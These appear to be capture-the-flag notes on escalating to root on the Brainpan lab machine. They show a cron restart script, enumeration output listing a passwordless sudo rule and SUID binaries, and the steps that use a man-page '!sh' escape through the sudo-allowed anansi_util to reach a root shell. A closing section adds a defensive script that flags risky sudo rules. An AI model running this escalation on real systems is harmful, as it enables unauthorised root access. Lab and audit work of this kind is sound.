4 privesc
# checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep brainpan.exe | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
        killall wineserver
        killall winedevice.exe
    fi
    /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi
# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
    fi
    cd /home/puck/web
    /usr/bin/python -m SimpleHTTPServer 10000
fi
Directory of Z:\home
3/4/2013 2:38 PM <DIR> anansi
3/6/2013 3:23 PM <DIR> puck
3/4/2013 2:43 PM <DIR> reynard
PEAS
[+] Cron jobs
* * * * * /home/puck/checksrv.sh
[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
[+] Searching ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
[+] SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root lpadmin 14K Dec 4 2012 /usr/bin/lppasswd
-rwsr-xr-x 1 anansi anansi 8.6K Mar 4 2013 /usr/local/bin/validate
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
https://gtfobins.github.io/gtfobins/man/
cd /tmp
echo "man man" > top
chmod +x top
sudo /home/anansi/bin/anansi_util manual man
!sh
whoami
root
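The sudo rule in the PEAS output above grants NOPASSWD root execution of a binary in another user's home directory, outside every secure_path directory. As an added example (not part of the original notes), the script below audits `sudo -l` output for such rules; the function names and the "outside secure_path" heuristic are assumptions of this example.

```sh
#!/bin/sh
# Added example, not from the original notes: audit `sudo -l` output for
# NOPASSWD rules whose target sits outside every secure_path directory.

# Constructed sample input: the `sudo -l` output recorded in the notes.
sample_sudo_l() {
cat <<'EOF'
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
EOF
}

# Hypothetical helper: reads `sudo -l` output on stdin and prints
# "<run-as> <command>" for each NOPASSWD command to review.
flag_nopasswd_outside_secure_path() {
awk '
/secure_path=/ {
    sp = $0
    sub(/.*secure_path=/, "", sp)   # keep only the value
    sub(/,.*/, "", sp)              # drop any following Defaults entries
    gsub(/\\/, "", sp)              # sudo prints the colons as "\:"
    n = split(sp, dirs, ":")
    for (i = 1; i <= n; i++) trusted[dirs[i]] = 1
    next
}
/^[ \t]*\([^)]*\).*NOPASSWD:/ {
    runas = $0; sub(/^[ \t]*\(/, "", runas); sub(/\).*/, "", runas)
    cmds = $0;  sub(/.*NOPASSWD:[ \t]*/, "", cmds)
    m = split(cmds, list, ",")
    for (j = 1; j <= m; j++) {
        split(list[j], words, " ")  # first word is the command path
        path = words[1]
        dir = path; sub("/[^/]*$", "", dir)
        # Heuristic (assumption): flag ALL and anything outside secure_path.
        if (path == "ALL" || !(dir in trusted)) print runas, path
    }
}'
}

sample_sudo_l | flag_nopasswd_outside_secure_path
```

On a live host, pipe `sudo -l -U <user>` into the function for each account and review every flagged path for ownership, write permissions and shell-escape features such as pagers.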